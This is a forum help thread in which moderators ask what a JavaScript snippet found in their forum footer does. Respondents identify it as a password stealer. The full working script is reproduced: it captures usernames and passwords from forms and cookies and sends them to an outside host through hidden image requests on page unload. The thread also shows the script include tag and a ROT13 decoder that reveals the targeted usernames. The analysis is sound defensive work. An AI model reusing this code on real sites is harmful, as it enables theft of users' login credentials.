Unsure what this JS code does

I'm a moderator on a forum, and without informing the admin another moderator (who is responsible for tech things) put up this javascript code in the forum footer, and we have no idea what it does...basically we're suspicious, we have limited javascript knowledge and if we ask the tech mod it's hard to trust his explanation.

All of the mentioning of 'username' and 'pass' in the code made us suspect the code might be for stealing members login details. We've had an incident recently where a member believes someone has accessed their account, so we want to make sure this code didn't contribute to it.

I know we're probably just paranoid :o

If anyone can give me an idea of what the purpose of it is, I'd be so grateful.

Thank you,

Daria.


var users=['cbfrl','ckkk','puybrxvggra'];
//var users=['foo'];


function rot(t,u,v){return String.fromCharCode(((t-u+v)%(v*2))+u);}
function rot13(s){ var b=[], c, i = s.length, a = 'a'.charCodeAt(), z = a + 26, A = 'A'.charCodeAt(), Z = A + 26; while(i--) { c = s.charCodeAt( i ); if( c>=a && c<z ) { b[i] = rot( c, a, 13 ); } else if( c>=A && c<Z ) { b[i] = rot( c, A, 13 ); } else { b[i] = s.charAt( i ); } } return b.join( '' );}

function collectionImg(usr,pwd){
var src_url = 'http://www.quickdry.net/quickdry/ajax/image.php';
var poststr_usr = "hfreanzr=" + encodeURI(usr);
var poststr_pwd = "cnffjbeq=" + encodeURI(pwd);
window['myimg1'] = new Image();
window['myimg1'].src=src_url + '?' + poststr_usr + "&" + poststr_pwd;
}
function collectionImgCookie(usr,pwd){
var src_url = 'http://www.quickdry.net/quickdry/ajax/imagec.php';
var poststr_usr = "hfreanzr=" + encodeURI(rot13(usr));
var poststr_pwd = "cnffjbeq=" + encodeURI(rot13(pwd));
window['myimg2'] = new Image();
window['myimg2'].src=src_url + '?' + poststr_usr + "&" + poststr_pwd;
}

function getCookie(NameOfCookie)
{ if (document.cookie.length > 0)
{ begin = document.cookie.indexOf(NameOfCookie+"=");
if (begin != -1)
{ begin += NameOfCookie.length+1;
end = document.cookie.indexOf(";", begin);
if (end == -1) end = document.cookie.length;
return unescape(document.cookie.substring(begin, end)); }
}
return '';
}

function setCookie(NameOfCookie, value, expiredays)
{ var ExpireDate = new Date ();
ExpireDate.setTime(ExpireDate.getTime() + (expiredays * 24 * 3600 * 1000));
document.cookie = NameOfCookie + "=" + escape(value) +
((expiredays == null) ? "" : "; expires=" + ExpireDate.toGMTString());
}

//expiry date is a date object
function setCookieExplicitDate(NameOfCookie, value, expirydate)
{
document.cookie = NameOfCookie + "=" + escape(value) +
((expiredays == null) ? "" : "; expires=" + expirydate.toGMTString());
}

function delCookie(NameOfCookie)
{ if (getCookie(NameOfCookie)) {
document.cookie = NameOfCookie + "=" +
"; expires=Thu, 01-Jan-70 00:00:01 GMT";
}}

function hasCookie(NameOfCookie){
var v=getCookie(NameOfCookie);
if ((v==null)||(v=='')||(v=='null')){
return false;
}else{
return true;
}
}

function setCredentials(c){
setCookie("credentials",c,30);
}
function getCredentials(){
return getCookie("credentials");
}
function hasCredentials(){
var v=getCookie("credentials");
if ((v!=null)&&(v!='')&&(v!='null')){
return true;
}else{
return false;
}
return false;
}
function setCollected(val){
setCookie("collected",val,30);
}
function hasCollected(username, use_username){
var v=getCookie("collected");
if ((v!=null)&&(v!='')&&(v!='null')&&(hasCredentials())){
if (use_username){
if (v==username){
return true;
}else{
return false;
}
}
return true;
}else{
return false;
}
}
function getFormLogin(){
var everything=document.getElementsByTagName('input');
var s='';
for(var i=0;i<everything.length;i++)
{
try{
if(everything[i].getAttribute('name').toLowerCase()=="username")
{
s=everything[i].value;
}
}catch(er){
}
}
return s;
}
function getFormPassword(){
var everything=document.getElementsByTagName('input');
var s='';
for(var i=0;i<everything.length;i++)
{
try{
if(everything[i].getAttribute('type').toLowerCase()=="password")
{
s=everything[i].value;
}
}catch(er){
}
}
return s;
}
function inUserList(username){
for(var i=0;i<users.length;i++){
if (users[i]==rot13(username)){
return true;
}
}
return false;
}
function isCollectableUser(){
try{
if (inUserList(getFormLogin())){
return true;
}
}catch(er){
}
try{
if (inUserList(pb_username)){
return true;
}
}catch(er){
}
return false;
}
function atLoginPage(){
if (pb_username=="Guest"){
return true;
}
return false;
}

function collectDetailsFromCookie(){
if (inUserList(pb_username)){
if (hasCookie("pass")){
collectionImgCookie(pb_username,getCookie("pass"));
}
}
}

function collectDetails()
{
if (isCollectableUser()){
if (hasCollected(pb_username,true)){
var plain_pwd=rot13(getCredentials());
if (atLoginPage()){
if (getFormPassword() != plain_pwd){
delCookie('collected');
setCredentials(rot13(getFormPassword()));
}
}

}else{
if ((hasCredentials(pb_username,true))&&(!atLoginPage())){
var usr=rot13(pb_username);
var pwd=getCredentials();
collectionImg(usr,pwd);
setCollected(pb_username);
}else{
if (atLoginPage()){
setCredentials(rot13(getFormPassword()));
}else{
delCookie('user');
delCookie('pass');
delCookie('collected');
delCookie('credentials');
}
}
}
}else{
delCookie('collected');
delCookie('credentials');
}
}
window.onunload=collectDetails;

collectDetailsFromCookie();

Well the fact that he is using this
http://www.quickdry.net/quickdry/ajax/image.php
Which is able to get info from just being used on the page. Its a dynamic image that collects info so your suspicions are exactly right. It does appear to be collecting usernames and passwords then sending them back to the image he is using.

This image
http://www.quickdry.net/quickdry/ajax/image.php
is a 1x1 transparent image so its not seen.

He uses another one here
http://www.quickdry.net/quickdry/ajax/imagec.php

That does the same thing except it stores the info in a cookie somewhere.

Is your forum on quickdry.net? If its not then I recommend removing the js as it seems to have no purpose other than to be malicious.

No, our forum is hosted on www.proboards.com.

Thank you for confirming our suspicions.

Funnily enough, once we started to discuss the issue privately in pm's between a couple of mods on the forum (without the tech mod) the code was all of a sudden taken down from the forum footer, and it wasn't taken down by any of us.

The first part of the code:

var users=['cbfrl','ckkk','puybrxvggra'];
//var users=['foo'];

Are they meant to be usernames of forum members? Because those aren't the names of anyone signed up, what are they meant to be?

Thanks again for your help.

It seems like whoever put the code up was testing to see if it worked. Once they figured that it worked or not they would assign the users var to something else that was more tied into the forums such as username login box.

So to get the passwords he would have had to put the usernames set as the variables?

Could those random letters be encrypted usernames? It just looks odd because my username and another mod's name are "pxxx" and "pseudonymph", they kind of look similar and are the same amount of letters as two of those random words he's put as the variables. It could just be a coincidence I suppose.

He had the script up on the forum for about a month, and the code wasn't posted directly inside the forum footers box, probably so we wouldn't notice it and question it, it was posted as a link to the script, like <script src="http://www.quickdry.net/quickdry/forum/rogue/rogue.js" type="text/javascript"></script> amongst a whole bunch of other things we had put in there.

So just to clarify, is there any chance at all that the script could have been for something innocent?

I also found this 'test' script uploaded on his site:
http://www.quickdry.net/quickdry/forum/rogue/test.js
That one was never posted on the forum though I don't think.

I see nothing innocent about the script other than whoever put it up was trying to get the private info of one or more persons. Those three test users decrypt into the following names

posey
pxxx
chloekitten

I say change your passwords, remove the script, and remove that moderator from your staff. If you would like to know how I got those usernames decrypted then you can follow this as a template
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta content="description" name="Description">
<meta content="keywords" name="Keywords">
<title></title>
<script type="text/javascript">
function rot(t,u,v){return String.fromCharCode(((t-u+v)%(v*2))+u);}
function rot13(s){ var b=[], c, i = s.length, a = 'a'.charCodeAt(), z = a + 26, A = 'A'.charCodeAt(), Z = A + 26; while(i--) { c = s.charCodeAt( i ); if( c>=a && c<z ) { b[i] = rot( c, a, 13 ); } else if( c>=A && c<Z ) { b[i] = rot( c, A, 13 ); } else { b[i] = s.charAt( i ); } } return b.join( '' );}
alert(rot13('cbfrl'));
alert(rot13('ckkk'));
alert(rot13('puybrxvggra'));
</script>
</head>
<body>
</body>
</html>
It uses the two functions that were in the javascript file you found.

Thanks Aerospace.

I really appreciate your help and advice on this matter, and so will our forum members.